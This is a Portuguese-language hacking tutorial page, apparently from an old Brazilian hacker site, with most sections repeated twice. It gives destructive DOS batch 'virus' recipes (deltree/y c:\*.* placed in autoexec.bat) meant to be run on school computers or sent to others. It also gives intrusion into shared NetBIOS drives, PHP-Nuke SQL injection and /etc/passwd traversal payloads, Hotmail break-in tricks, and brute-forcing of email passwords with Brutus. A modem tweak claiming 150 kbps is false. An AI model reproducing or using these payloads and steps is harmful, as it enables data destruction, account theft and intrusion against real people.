Se vc nao sabe o que esta fazendo nao faça
Introdução:
Badcom's são pequenos arquivos (.COM) que quando executados, eles realizam tarefas em um determinado computador... ou seja, são programas que fazem com que um PC realize comandos quanto do DOS quanto do Windows. Para isto você deve fazer um arquivo de LOTE com os comandos e compila-lo O Mais famoso compilador de arquivos de LOTE (.BAT) é o BAT2EXEC.COM.
Comandos Básicos
@ECHO OFF
Comando para não ser mostrados as linhas de comando em uma janela do MS-DOS, Exemplo: Colocando o comando DIR em um Badcom sem o @ECHO OFF no prompt ele mostrará o comando escrito na janela.. C:\DIR Com o comando @ECHO OFF, ele simplesmente elimina os dígitos dos comandos a serem mostrados.
CLS
Comando do MS-DOS, para limpar a tela.
ECHO
Para desativar o comando @ECHO OFF, e mostrar caracteres em uma janela Exemplo: ECHO "Mensagem" Irá mostrar a mensagem na janela, após isso automaticamente retorna a não aparição de comandos na Janela. Criando arquivos com o comando ECHO: Para criar um arquivo com este comando, é necessário o comando , exemplo: ECHO Nomedoarquivo.extensão Irá criar o arquivo no ambiente do MS-DOS... Para criar arquivos com textos ou comandos, é necessário fazer o seguinte comando: ECHO ARQ.EXT "Comando ou mensagem" OBS: As aspas são apenas para indicação porém em comandos não funcionam as aspas. Ex: ECHO Eu.BAT DIR Irá criar um arquivo chamado Eu.BAT (Arquivo de Lote) Com o comando DIR dentro do mesmo.
ATTRIB
Este comando permite que você esconda um determinado arquivo, torne-o somente para leitura, ou torne arquivo do sistema. Para obter os comandos simplesmente digite na janela do MS-DOS: ATTRIB /?
MD
Para Criar diretórios Ex: MD NOMEDODIR
RD
Comando para desfazer diretórios vazios. EX: RD 'NOME DA PASTA VAZIA'
PROGRAMAS!!!
Não é um comando.. heheh... é que nos Badcom's são muito útil o uso de programas comuns, como os padrões do Windows 95. Exemplo: O Programa Notepad.exe do Windows 95, para ele ser executado, A partir de um Badcom, você deve colocá-lo na linha de comando.. NOTEPAD.EXE. Para executar o programa a partir de um Badcom... no BAT coloque da seguinte forma: @echo off cls notepad.exe <--- Não é necessário colocar o Path do Windows 95, pois Sendo executado durante o Windows, não acontecerá erros de não achar o programa.. Se quiser abrir textos com o tal programa ! notepad.exe arquivo.txt Você pode fazer isto com outros programas como o Pbrush.exe ( Paint ), Sol.exe ( Paciência ). Desde que estes programas instalados.
DEL ou DELETE
Para apagar arquivos, no Badcom é usado da seguinte maneira, Para deletar arquivos sem ter problemas de BUG, é necessário fazer com que o comando não tenha a opção (*.*), pois surgirá um prompt de confirmação de exclusão. Digite então da seguinte maneira: DEL *.Extensão, exemplo.. para apagar os arquivos .INI do diretório do Windows: del Drive:\windir\*.ini ou use: drive: cd\ cd windir del *.ini
DELTREE
Muitos não tem conhecimento do que este comando pode causar em um sistema, pois é usado da maneira básica... Este "pode ser" o mais perigoso comando contido em um Badcom. Uso com BUG: DELTREE DIRETORIO Com este comando, aparecerá a confirmação de exclusão do diretório, será muito difícil alguém responder SIM a pergunta não ??? Bem, vou informar o perigo deste comando... Há uma opção no DELTREE que evita a aparição do prompt de confirmação, sendo ela a mais destrutiva, deletando todos os arquivos de um dir. Bom, para usar o Deltree de forma destrutiva basta acrescentar a opção /Y no mesmo, Exemplo: C:\Deltree /y windows Excluindo windows...
REN
Rename é um comando que pode causar dor de cabeça ao usuário atacado.. ex: use o REN em diversos arquivos... REN command.com command.nad REN Autoexec.bat autoexec.non e assim vai...
PROMPT
Com este comando você pode trocar o C:\> do Ms-dos pelo que você quiser. Por exemplo: C:\> PROMPT teste:\> teste:\>
GOTO
Este comando faz com que o BAT pule ou volte para determinada parte do Programa. Exemplo: O uso do GOTO é muito usado se quiser que não pare de repetir determinado comando ... usando o comando CLS, veja:
@echo off
:INI <-- Indica a parte do programa onde vai ser voltado o comando
Cls Usam-se dois ponto antes, outros exemplos são :START :COMEÇO GOTO INI <-- Aqui o comando GOTO, para voltar para o alvo indicado.
CHOICE
Comando que possibilita um prompt, exemplo: CHOICE /c1234 Para números ou letras é necessário o uso do /c, sem este comando somente CHOICE, mostrará o prompt:
Hackeando por TELNET
Hackeando por TELNET
TELNET (protocolo de terminal virtual) é o protocolo internet para estabelecer a conexão entre computadores. Através dessa conexão remota, pode-se executar programas e comandos em outra maquína. como se o teclado de seu computador estivesse ligado diretamente a ela. O visual de uma conexão via telnet é semelhante ao que se tem em BBBs de interface DOS, e as operações do computador remoto se dá mesma forma, ou seja, através de uma linha de comandos Unix ou a partir de um menu de comandos disponiveis que sempre se apresenta em algum lugar da tela (está útima forma é a mais comum em servidores que permitem acesso publico). O telnel pode ser usado para a pesquisa de informações e transferência de arquivos - tudo depende do que o computador ao qual você está conectado permitir que você faça. Ele tambem é muito usado por operadores de sistemas (Sysop) a fim de fazer qulgum tipo de manuntenção (se você pensa que o sysop de seu provedor sai de casa toda vez que tem alguma problema nos servidores, está muito enganado: muitas vezes ele faz manuntenção de casa mesmo, via telnet)
Conectando-se via telnet
Os passos que apresentamos aqui são para o programa que aconpanha o windows 95, mas servem perfeitamente para outros programas, com algumas variedades, que você pode perceber e contonar. Se você tem alguma dos programas listados ao lado, leia isto primeiro e depois passe para a pagina especifica desse programa. Inicie o programa telnet.exe ou outro ultilitario para esse fom.Cloque no menu (conectar), selecione"Sistema Remoto" o endereço ao qual você que se conectar(ex.:spacelink.msfc.nasa.gov).
Nas caixas"Porta" (port) e tipo de terminal (terminal type selecione "telnet" e "vt100", respectivamente (isso não é um padão, mas é usual; pode ser que em alguns lugares você tenha que mudar essa configuração). Feito isso, clique no botão "conectar"(connect).Isto inicia a conexão com o computador remoto. Frequentemente, ao se completar a conexão, o sistema remoto pede uma senha.No nosso exemplo, digite "quest" e aperte enter(lembre-se, você operando um sistema de interface parecida com oDOS - naverdade =e UNIX - esqueça o mouse e use o Teclado).Isto abrirá as portas do computador remoto para você. Na tela surge uma série de opções, preceditas de um número ou letra. Para executar um desses commandos, digite esse número ou letra e aperte enter (os usuarios da época pré-windows não terão a menór dificuldade Nisso.) Explore o sistema ao qual você se conectou para exercitar.Quando quiser terminar a conexão, volte ao menu "conectar" e selecione "Desconectar".
Abaixo temos alguns endereços onde você pode fazer uma conexão via telnet. netfind.if.usp.br Busca mundial de usuarios na internet. Digite netfind ao estabelecer a conexão. ned.ipa.caltech.edu Banco de dados Extragalatico da NASA/IPAC. Digite ned na conexão. spacelink.msfc.nasa.gov Banco de dados da NASA Digite guest ao se conectar. stis.nsf.gov informações cientificas e tecnológicas. Digite public na conexão. aleph.pucrs.br(*) PUC - Pontifica Universidade Católica. Porto Alegre, RS. Acesso a banco de dados Bobliograficos.(*) username "guest". asterix.ufrgs.br(*) UFRGS - Univercidade Federal do Rio Grande do Sul. Porto Alégre, RS, Acesso a banci de dados bibliograficos.(*)username "sabibib", password "bib1993". bee08.uspnet.usp.br(*) USP/CCE - Univercidade de São paulo. Centro de Computação eletronica. São Paulo, SP.Acesso a banco de dados bibliograficos.(*) username"dedalus". brmc.bireme.br(*)BIREME - Bibliotéca de Resenha Medica.São Paulo, SP.Acesso a banco de dados na área de saude.(*) username "bireme". (É necessario cadastrar-se, envie mensagem para online@bireme.br").
TELNET (protocolo de terminal virtual) é o protocolo internet para estabelecer a conexão entre computadores. Através dessa conexão remota, pode-se executar programas e comandos em outra maquína. como se o teclado de seu computador estivesse ligado diretamente a ela. O visual de uma conexão via telnet é semelhante ao que se tem em BBBs de interface DOS, e as operações do computador remoto se dá mesma forma, ou seja, através de uma linha de comandos Unix ou a partir de um menu de comandos disponiveis que sempre se apresenta em algum lugar da tela (está útima forma é a mais comum em servidores que permitem acesso publico). O telnel pode ser usado para a pesquisa de informações e transferência de arquivos - tudo depende do que o computador ao qual você está conectado permitir que você faça. Ele tambem é muito usado por operadores de sistemas (Sysop) a fim de fazer qulgum tipo de manuntenção (se você pensa que o sysop de seu provedor sai de casa toda vez que tem alguma problema nos servidores, está muito enganado: muitas vezes ele faz manuntenção de casa mesmo, via telnet)
Conectando-se via telnet
Os passos que apresentamos aqui são para o programa que aconpanha o windows 95, mas servem perfeitamente para outros programas, com algumas variedades, que você pode perceber e contonar. Se você tem alguma dos programas listados ao lado, leia isto primeiro e depois passe para a pagina especifica desse programa. Inicie o programa telnet.exe ou outro ultilitario para esse fom.Cloque no menu (conectar), selecione"Sistema Remoto" o endereço ao qual você que se conectar(ex.:spacelink.msfc.nasa.gov).
Nas caixas"Porta" (port) e tipo de terminal (terminal type selecione "telnet" e "vt100", respectivamente (isso não é um padão, mas é usual; pode ser que em alguns lugares você tenha que mudar essa configuração). Feito isso, clique no botão "conectar"(connect).Isto inicia a conexão com o computador remoto. Frequentemente, ao se completar a conexão, o sistema remoto pede uma senha.No nosso exemplo, digite "quest" e aperte enter(lembre-se, você operando um sistema de interface parecida com oDOS - naverdade =e UNIX - esqueça o mouse e use o Teclado).Isto abrirá as portas do computador remoto para você. Na tela surge uma série de opções, preceditas de um número ou letra. Para executar um desses commandos, digite esse número ou letra e aperte enter (os usuarios da época pré-windows não terão a menór dificuldade Nisso.) Explore o sistema ao qual você se conectou para exercitar.Quando quiser terminar a conexão, volte ao menu "conectar" e selecione "Desconectar".
Abaixo temos alguns endereços onde você pode fazer uma conexão via telnet. netfind.if.usp.br Busca mundial de usuarios na internet. Digite netfind ao estabelecer a conexão. ned.ipa.caltech.edu Banco de dados Extragalatico da NASA/IPAC. Digite ned na conexão. spacelink.msfc.nasa.gov Banco de dados da NASA Digite guest ao se conectar. stis.nsf.gov informações cientificas e tecnológicas. Digite public na conexão. aleph.pucrs.br(*) PUC - Pontifica Universidade Católica. Porto Alegre, RS. Acesso a banco de dados Bobliograficos.(*) username "guest". asterix.ufrgs.br(*) UFRGS - Univercidade Federal do Rio Grande do Sul. Porto Alégre, RS, Acesso a banci de dados bibliograficos.(*)username "sabibib", password "bib1993". bee08.uspnet.usp.br(*) USP/CCE - Univercidade de São paulo. Centro de Computação eletronica. São Paulo, SP.Acesso a banco de dados bibliograficos.(*) username"dedalus". brmc.bireme.br(*)BIREME - Bibliotéca de Resenha Medica.São Paulo, SP.Acesso a banco de dados na área de saude.(*) username "bireme". (É necessario cadastrar-se, envie mensagem para online@bireme.br").
Hackeando Pelo IP
Hackeando Pelo IP
Certifique-se de que a pessoa que você quer invadir possui este progama: nbtstat..Vá ao prompt do MS-DOS...Digite: nbtstat-a IP do cara que você quer invadir....Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se aparecerá: Host Not Found (o problema é que não da pra invadir o computador de certos gajos por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC compartilhamento de de arquivos as pastas)....Caso apareça um monte de nome esquisitos com isso antes: "<03>", você deve pegar o nome da frase que estiver com <03> atrás do nome...Crie um arquivo .txt como o nome de LMHOSTS. Digite lá: IP da vitima e NETBIOS dela. O NETBIOS é aquele nome esquisito que tem atrás. (Digite Exatamente desta forma> IP Netbios)....Mapeie sau unidade de disco de forma que a maquina da vitima se torne parte de seu PC....Vá em "iniciar", "executar" e digite: //IP_da_vitma e da "OK" pronto você invadiu por IP.
Conselho. Não apague nem modifique NADA somente vasculhe bastante nas coisas do individuo e se achar algo interessante tira para você. Eu Lincoln e Junior não te aconselhamos a fazer isso, só estamos mostramos como é, mas não é para você fazer.
Certifique-se de que a pessoa que você quer invadir possui este progama: nbtstat..Vá ao prompt do MS-DOS...Digite: nbtstat-a IP do cara que você quer invadir....Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se aparecerá: Host Not Found (o problema é que não da pra invadir o computador de certos gajos por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC compartilhamento de de arquivos as pastas)....Caso apareça um monte de nome esquisitos com isso antes: "<03>", você deve pegar o nome da frase que estiver com <03> atrás do nome...Crie um arquivo .txt como o nome de LMHOSTS. Digite lá: IP da vitima e NETBIOS dela. O NETBIOS é aquele nome esquisito que tem atrás. (Digite Exatamente desta forma> IP Netbios)....Mapeie sau unidade de disco de forma que a maquina da vitima se torne parte de seu PC....Vá em "iniciar", "executar" e digite: //IP_da_vitma e da "OK" pronto você invadiu por IP.
Conselho. Não apague nem modifique NADA somente vasculhe bastante nas coisas do individuo e se achar algo interessante tira para você. Eu Lincoln e Junior não te aconselhamos a fazer isso, só estamos mostramos como é, mas não é para você fazer.
Criando Virus
Criando Virus 1
Em primeiro lugar, você deve abrir o MS-DOS e seguir o proximos passos....Digit: Edit(nome do seu arquivo).bat, deverá aparecer uma tela azul.Entre com os comandos: @ECHO OFF e BREAK OFF.A página deverá ficar da seguinte maneira
@ECHO OFF BREAK OFF
Depois disso, a pessoa escolhe o que seu vírus deve fazer.Depois ela usa o comando copy a:\(nome do seu vírus).bat autoexec.bat, ela então terá certeza de estar executando seu vírus ao iniciar o computador-alvo.Agora vamos supor que o seu vírus seja capaz de apagar todos arquivos do PC alheio.Você deve usar o seguinte comando:
deltree/y c:\*.*
Agora, o vírus simples da pessoa está completo.É só a vítima (seu amiguinho) executar o arquivo e pronto!!!
Importante:
Caso a pessoa passe esse vírus via disquete, ele não deve esquecer de finalizar o arquivo com o comando deltree/y a:\*.* .Isso serve para não deixar vestígios de seu ato insano.
Criando Virus 2
Para fazer um virus existem muitas plataformas e varios tipos de virus existe virus tipo *.bat*.exe*.mid*.sis*.dll*.etc....tem todas as formas que você possa imaginar para criar um virus do tipo melissa ou I love you não basta 5 minutos e semanas ou até mesmo meses para adicionar suas configurações e o que ele ira causar as vitimas como se espalhar pelo computador ou se camuflar em outros executaveis ou até mesmo no momento se espalhar por toda sua lista de contatos e enviar varias copias dele mesmo para e-mails de amigos e qualquer pessoa que estiver na sua lista de contato.Os virus mais fracos os chamados *.bat ou mais conhecidos como virus batch são criados em minutos basta ter a formula isso você encontra você pega uma formula seja de um virus pra excluir o windows ou para enviar erros ao modem tanto faz sempre quando você mesmo criar uj batch nunca eu falei NUNCA rode ele no seu proprio HD para ver se funciona ou não prefira sempre os micros da escola ou mande para algum lamer (ou como preferir LAMER ou COBRA).Quer editar seu virus*.bat agora?então vamos lá clique no menu iniciar vá até programas em seguida aponte para acessórios e abra o arquivo NotePad ou WordPad lá você digita isso exatamente como esta aqui:
@ECHO OFF BREAK OFF deltree/C: Y\*.*
A: nome do virus.bat autoexec.bat
Em seguida salve esse arquivo assim: Nome do virus.bat
Pronto agora você tem um virus.bat no seu proprio micro nossa!!!!que emoção não sei se vou conseguir digitar mais(chega de brincadeira)
Agora de maneira nenhuma mesmo se desconfiar que esse virus está errado não abra esse arquivo então é só isso você agora já tem mais ou menos uma noção do que é um virus.bat e um .exe
Em primeiro lugar, você deve abrir o MS-DOS e seguir o proximos passos....Digit: Edit(nome do seu arquivo).bat, deverá aparecer uma tela azul.Entre com os comandos: @ECHO OFF e BREAK OFF.A página deverá ficar da seguinte maneira
@ECHO OFF BREAK OFF
Depois disso, a pessoa escolhe o que seu vírus deve fazer.Depois ela usa o comando copy a:\(nome do seu vírus).bat autoexec.bat, ela então terá certeza de estar executando seu vírus ao iniciar o computador-alvo.Agora vamos supor que o seu vírus seja capaz de apagar todos arquivos do PC alheio.Você deve usar o seguinte comando:
deltree/y c:\*.*
Agora, o vírus simples da pessoa está completo.É só a vítima (seu amiguinho) executar o arquivo e pronto!!!
Importante:
Caso a pessoa passe esse vírus via disquete, ele não deve esquecer de finalizar o arquivo com o comando deltree/y a:\*.* .Isso serve para não deixar vestígios de seu ato insano.
Criando Virus 2
Para fazer um virus existem muitas plataformas e varios tipos de virus existe virus tipo *.bat*.exe*.mid*.sis*.dll*.etc....tem todas as formas que você possa imaginar para criar um virus do tipo melissa ou I love you não basta 5 minutos e semanas ou até mesmo meses para adicionar suas configurações e o que ele ira causar as vitimas como se espalhar pelo computador ou se camuflar em outros executaveis ou até mesmo no momento se espalhar por toda sua lista de contatos e enviar varias copias dele mesmo para e-mails de amigos e qualquer pessoa que estiver na sua lista de contato.Os virus mais fracos os chamados *.bat ou mais conhecidos como virus batch são criados em minutos basta ter a formula isso você encontra você pega uma formula seja de um virus pra excluir o windows ou para enviar erros ao modem tanto faz sempre quando você mesmo criar uj batch nunca eu falei NUNCA rode ele no seu proprio HD para ver se funciona ou não prefira sempre os micros da escola ou mande para algum lamer (ou como preferir LAMER ou COBRA).Quer editar seu virus*.bat agora?então vamos lá clique no menu iniciar vá até programas em seguida aponte para acessórios e abra o arquivo NotePad ou WordPad lá você digita isso exatamente como esta aqui:
@ECHO OFF BREAK OFF deltree/C: Y\*.*
A: nome do virus.bat autoexec.bat
Em seguida salve esse arquivo assim: Nome do virus.bat
Pronto agora você tem um virus.bat no seu proprio micro nossa!!!!que emoção não sei se vou conseguir digitar mais(chega de brincadeira)
Agora de maneira nenhuma mesmo se desconfiar que esse virus está errado não abra esse arquivo então é só isso você agora já tem mais ou menos uma noção do que é um virus.bat e um .exe
INVASAO DE SITES QUE USAO NUKE-PHP
INVASAO DE SITES QUE USAO NUKE-PHP
...........................................................................................................................................................................................................................................
Primeiro vamos ver o que é Nuke-PHP.
ajudahacker.br30.com
O PHP-Nuke é um software gratuito criado pelo venezuelano Francisco Burzi, baseado na linguagem PHP. Devido à facilidade de uso,
principalmente para publicação de notícias, tornou-se bastante popular e foi adotado por inúmeros sites.
Ele é um pacote de software que permite administrar portais , realizando tarefas como atualizações de notícias e manutenção de usuários .
Muito útil para os usuários de PHP Atualmente milhares de sites rodam o software PHP-Nuke.
.................................................................................................................................................................................................................................................
Principais falhas:
Falha 1
-A senha de administração do PHP-Nuke é guardada em um cookie e codificada em Base64, um método de criptografia de 64 bits
considerado pouco seguro.
O ataque aos servidores pode ser feito atraves de códigos HTTP (isto significa que voce pode injetar os códigos no proprio navegador, de
preferencia o IE)
Falha 2
-erro no arquivo "opendir.php"
(...)
$REQUEST_URI = strip_tags($REQUEST_URI);
$res = explode("$PHP_SELF?", $REQUEST_URI);
$odp_cat = $res[1];
if (substr($odp_cat,0,1) == "/") $odp_cat = substr($odp_cat,1);
(define $requesturl)
(...)
Pratica 1 :
Vamos visualizar senhas criptografadas do aministrador e usuarios on line no site usando um codigo exploit.
código:
modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1 UNION SELECT name,1,pwd,aid FROM nuke_authors
Site ( vítima ):
WWW.SITEPRASERINVADIDO.COM
Injection pronto:
WWW.SITEPRASERINVADIDO.COM/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1 UNION SELECT name,
1,pwd,aid FROM nuke_authors
Obseve as senhas criptografadas, basta um decripter.
pratica 2 :
Na segunda falha podemos usar o operdir.phpInocente demais operdir(abrir diretorio)
Basta um pouquinho de conhecimento de UNIX que da para abrir o que quiser dentro no servidor.
Eu não vou colocar nenhum site aqui não =), mas um exemplo de exploit para localizar senhas fica assim:
/WWW.SITEPRASERINVADIDO.COM/opendir.php?requesturl=/etc/passwd
.......................................................................................................................................................................................................................................................
Este tipo de falha NÃO é uma coisa recente, faz muito tempo que existe, as ultimas versões do NUKE-PHP nem contem mais falhas
...........................................................................................................................................................................................................................................
Primeiro vamos ver o que é Nuke-PHP.
ajudahacker.br30.com
O PHP-Nuke é um software gratuito criado pelo venezuelano Francisco Burzi, baseado na linguagem PHP. Devido à facilidade de uso,
principalmente para publicação de notícias, tornou-se bastante popular e foi adotado por inúmeros sites.
Ele é um pacote de software que permite administrar portais , realizando tarefas como atualizações de notícias e manutenção de usuários .
Muito útil para os usuários de PHP Atualmente milhares de sites rodam o software PHP-Nuke.
.................................................................................................................................................................................................................................................
Principais falhas:
Falha 1
-A senha de administração do PHP-Nuke é guardada em um cookie e codificada em Base64, um método de criptografia de 64 bits
considerado pouco seguro.
O ataque aos servidores pode ser feito atraves de códigos HTTP (isto significa que voce pode injetar os códigos no proprio navegador, de
preferencia o IE)
Falha 2
-erro no arquivo "opendir.php"
(...)
$REQUEST_URI = strip_tags($REQUEST_URI);
$res = explode("$PHP_SELF?", $REQUEST_URI);
$odp_cat = $res[1];
if (substr($odp_cat,0,1) == "/") $odp_cat = substr($odp_cat,1);
(define $requesturl)
(...)
Pratica 1 :
Vamos visualizar senhas criptografadas do aministrador e usuarios on line no site usando um codigo exploit.
código:
modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1 UNION SELECT name,1,pwd,aid FROM nuke_authors
Site ( vítima ):
WWW.SITEPRASERINVADIDO.COM
Injection pronto:
WWW.SITEPRASERINVADIDO.COM/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1 UNION SELECT name,
1,pwd,aid FROM nuke_authors
Obseve as senhas criptografadas, basta um decripter.
pratica 2 :
Na segunda falha podemos usar o operdir.phpInocente demais operdir(abrir diretorio)
Basta um pouquinho de conhecimento de UNIX que da para abrir o que quiser dentro no servidor.
Eu não vou colocar nenhum site aqui não =), mas um exemplo de exploit para localizar senhas fica assim:
/WWW.SITEPRASERINVADIDO.COM/opendir.php?requesturl=/etc/passwd
.......................................................................................................................................................................................................................................................
Este tipo de falha NÃO é uma coisa recente, faz muito tempo que existe, as ultimas versões do NUKE-PHP nem contem mais falhas
Veja agora como hackear msn
I_1_I - Hackeando a força bruta
a. Use o seu Telnet para se conectar a porta 110 (Servidor da Hotmail)
b. Digite USER e o username da vitíma
c. Digite PASS e tente um password
d. Repita isso até que vc tenha achado a password correta
!. Esta técnica é chamada de hackeando a força bruta e requer paciência. É melhor que tentar chutar as passwords na Home page da hotmail pq é mais rápida.
I_2_I - O melhor método
a. Consiga o username da vitíma ( Geralmente fica no campo de endereço )
b. Então digite " www.hotmail.com/cgi-bin/start/usernamedavitíma "
c. Vc entrou
!. Esta técnica só funciona se vc estiver na mesma rede ou computador que a vitíma esta, e a vitíma não devera estar em log out
I_3_I - O método velho
a. Vá a Home page da Hotmail e consiga um acount (se vc já não possuir uma)
b. Dê um Log Out
c. Agora digite o username da vitíma
d. Olhe a origem do arquivo
e. Olhe a linha 50 vc devera encontrar "action=someadress"
d. Copie o endereço e coloque no campo de
e. Vc esta dentro
!. Tudo que vc vera que este é um grande procedimento e que a vitíma devera demorar bastante tempo para efetuar um Log Out
I_4_I - Outro método...
a. Vá a Home Page da Hotmail
b. Copie a origem do arquivo
c. Faça uma novo arquivo em HTML com o mesmo código só mude method=post para method=enter
d. "Veja" a página
e. No campo de endereço digite www.hotmail.com/ www.hotmail.com/ (pelo amor de deus não pressione enter)
f. Peça para vítima digitar sua senha e seu username
g. Olhe o campo do endereço. Vc deverá ver ...&password:something...
!. Este é o método que eu uso, pq ele te dá a passord. (A senha ficará na pasta de histórico do browser). Vou dar um exemplo deste método para vc ver como é : hem1.passagen.se/christog/index.htm. Boa sorte!
LEIA!
Os SysOps da hotmail mudaram o "sistema" então a vitíma deverá dar log out se vc já estiver dentro da conta dele/dela. Então não perca seu tempo.
a. Use o seu Telnet para se conectar a porta 110 (Servidor da Hotmail)
b. Digite USER e o username da vitíma
c. Digite PASS e tente um password
d. Repita isso até que vc tenha achado a password correta
!. Esta técnica é chamada de hackeando a força bruta e requer paciência. É melhor que tentar chutar as passwords na Home page da hotmail pq é mais rápida.
I_2_I - O melhor método
a. Consiga o username da vitíma ( Geralmente fica no campo de endereço )
b. Então digite " www.hotmail.com/cgi-bin/start/usernamedavitíma "
c. Vc entrou
!. Esta técnica só funciona se vc estiver na mesma rede ou computador que a vitíma esta, e a vitíma não devera estar em log out
I_3_I - O método velho
a. Vá a Home page da Hotmail e consiga um acount (se vc já não possuir uma)
b. Dê um Log Out
c. Agora digite o username da vitíma
d. Olhe a origem do arquivo
e. Olhe a linha 50 vc devera encontrar "action=someadress"
d. Copie o endereço e coloque no campo de
e. Vc esta dentro
!. Tudo que vc vera que este é um grande procedimento e que a vitíma devera demorar bastante tempo para efetuar um Log Out
I_4_I - Outro método...
a. Vá a Home Page da Hotmail
b. Copie a origem do arquivo
c. Faça uma novo arquivo em HTML com o mesmo código só mude method=post para method=enter
d. "Veja" a página
e. No campo de endereço digite www.hotmail.com/ www.hotmail.com/ (pelo amor de deus não pressione enter)
f. Peça para vítima digitar sua senha e seu username
g. Olhe o campo do endereço. Vc deverá ver ...&password:something...
!. Este é o método que eu uso, pq ele te dá a passord. (A senha ficará na pasta de histórico do browser). Vou dar um exemplo deste método para vc ver como é : hem1.passagen.se/christog/index.htm. Boa sorte!
LEIA!
Os SysOps da hotmail mudaram o "sistema" então a vitíma deverá dar log out se vc já estiver dentro da conta dele/dela. Então não perca seu tempo.
Melhorar a sua conecção discada.
Melhorar a sua conecção discada.
1ºvá em "meu computador"depois vc clica com o botão direito e vai em propriedas
2º vc clica em hardware
3º clica em gerenciador de dispositivos
4º vc vai em modem e clica no mais
5º depois vc clica com o botão direito e vai propridadas (no modem)
6º vc clica em avançados
7º cola esse código
AT&FX S11=50
depois vc confirma e pronto...
o codigo funciona mesmo de verdade.
Agora a sua conekeção é de 150 kbp/s \o/
SE VC NÃO GOSTAR DO CODIGO, BASTA COLOCAR O MESMO CODIGO QUE TINHA LA...
NX
1ºvá em "meu computador"depois vc clica com o botão direito e vai em propriedas
2º vc clica em hardware
3º clica em gerenciador de dispositivos
4º vc vai em modem e clica no mais
5º depois vc clica com o botão direito e vai propridadas (no modem)
6º vc clica em avançados
7º cola esse código
AT&FX S11=50
depois vc confirma e pronto...
o codigo funciona mesmo de verdade.
Agora a sua conekeção é de 150 kbp/s \o/
SE VC NÃO GOSTAR DO CODIGO, BASTA COLOCAR O MESMO CODIGO QUE TINHA LA...
NX
Roubando senhas
Roubando senhas
Roubando senhas GLOBO.COM
Para roubar senha da Globo , baixe o programa Brutus AET2 , que se encontra sem nosso. Após ter baixado o programa , abra - o. Agora lá em cima do lado esquerdo você verá " Target " , pois então você irá digitar no campo o seguinte : " pop3.globo.com.br " , depois você verá " Type " do lado de Traget , você irá selecionar " POP3 ". Depois no meio do programa você verá " Authentication Options " e verá Single User , então você irá selecionar Single User e deixe o campo User Username selecionado também. Em User File você irá digitar o nome de usário da vítima, por exemplo , se o email da vítima for : vitima@globo.com.br , então o nome de usuário da vítima é : vitima. Em Pass Mode deixe selecionado Word List. Em Pass File selecione sua Wordlist , caso você não tenha , baixe a wordlist em nosso site, e depois crie uma. Depois finalmente você irá clicar em " Start " e espere até que ache a senha da vítima, o resultado irá aparecer em Positive Authentication Results.
Roubando senhas do Yahoo
Para roubar senha do Yahoo , baixe o programa Brutus AET2 , que se encontra sem nosso. Após ter baixado o programa , abra - o. Agora lá em cima do lado esquerdo você verá " Target " , pois então você irá digitar no campo o seguinte : " pop3.yahoo.com.br " , depois você verá " Type " do lado de Traget , você irá selecionar " POP3 ". Depois no meio do programa você verá " Authentication Options " e verá Single User , então você irá selecionar Single User e deixe o campo User Username selecionado também. Em User File você irá digitar o nome de usário da vítima, por exemplo , se o email da vítima for : vitima@yahoo.com.br , então o nome de usuário da vítima é : vitima. Em Pass Mode deixe selecionado Word List. Em Pass File selecione sua Wordlist , caso você não tenha , baixe a wordlist em nosso site, e depois crie uma. Depois finalmente você irá clicar em " Start " e espere até que ache a senha da vítima, o resultado irá aparecer em Positive Authentication Results.
Roubando senhas GLOBO.COM
Para roubar senha da Globo , baixe o programa Brutus AET2 , que se encontra sem nosso. Após ter baixado o programa , abra - o. Agora lá em cima do lado esquerdo você verá " Target " , pois então você irá digitar no campo o seguinte : " pop3.globo.com.br " , depois você verá " Type " do lado de Traget , você irá selecionar " POP3 ". Depois no meio do programa você verá " Authentication Options " e verá Single User , então você irá selecionar Single User e deixe o campo User Username selecionado também. Em User File você irá digitar o nome de usário da vítima, por exemplo , se o email da vítima for : vitima@globo.com.br , então o nome de usuário da vítima é : vitima. Em Pass Mode deixe selecionado Word List. Em Pass File selecione sua Wordlist , caso você não tenha , baixe a wordlist em nosso site, e depois crie uma. Depois finalmente você irá clicar em " Start " e espere até que ache a senha da vítima, o resultado irá aparecer em Positive Authentication Results.
Roubando senhas do Yahoo
Para roubar senha do Yahoo , baixe o programa Brutus AET2 , que se encontra sem nosso. Após ter baixado o programa , abra - o. Agora lá em cima do lado esquerdo você verá " Target " , pois então você irá digitar no campo o seguinte : " pop3.yahoo.com.br " , depois você verá " Type " do lado de Traget , você irá selecionar " POP3 ". Depois no meio do programa você verá " Authentication Options " e verá Single User , então você irá selecionar Single User e deixe o campo User Username selecionado também. Em User File você irá digitar o nome de usário da vítima, por exemplo , se o email da vítima for : vitima@yahoo.com.br , então o nome de usuário da vítima é : vitima. Em Pass Mode deixe selecionado Word List. Em Pass File selecione sua Wordlist , caso você não tenha , baixe a wordlist em nosso site, e depois crie uma. Depois finalmente você irá clicar em " Start " e espere até que ache a senha da vítima, o resultado irá aparecer em Positive Authentication Results.
Pegar IP pelo chat
Pegar IP pelo chat
Ips no Chat
Entre em um chat (UOL por exemplo) e escolha uma vítima...de exemplo vou chamar a vítima de Marcio. Selecione a opção: "só receber mensagens de"; e fique falando com o marcos... Abra o prompt do DOS e digite arp -a (quando fizer isso eh melhor que esteja com icq e outros programas de rede fechados...feche outros sites tbm..) agora tecle enter...aparecerá vários ips... Normalmente o segundo é o da vitima...para ver se não está pegando seu proprio ip abra o iniciar va em executar e depois escreva winipcfg...confira se todos os ips do winipcfg naum estão na lista se estiverem não pegue nenhum desses... Agora que vc tem o ip do cara nuke ele ou invada...hahaha
Ips no Chat
Entre em um chat (UOL por exemplo) e escolha uma vítima...de exemplo vou chamar a vítima de Marcio. Selecione a opção: "só receber mensagens de"; e fique falando com o marcos... Abra o prompt do DOS e digite arp -a (quando fizer isso eh melhor que esteja com icq e outros programas de rede fechados...feche outros sites tbm..) agora tecle enter...aparecerá vários ips... Normalmente o segundo é o da vitima...para ver se não está pegando seu proprio ip abra o iniciar va em executar e depois escreva winipcfg...confira se todos os ips do winipcfg naum estão na lista se estiverem não pegue nenhum desses... Agora que vc tem o ip do cara nuke ele ou invada...hahaha
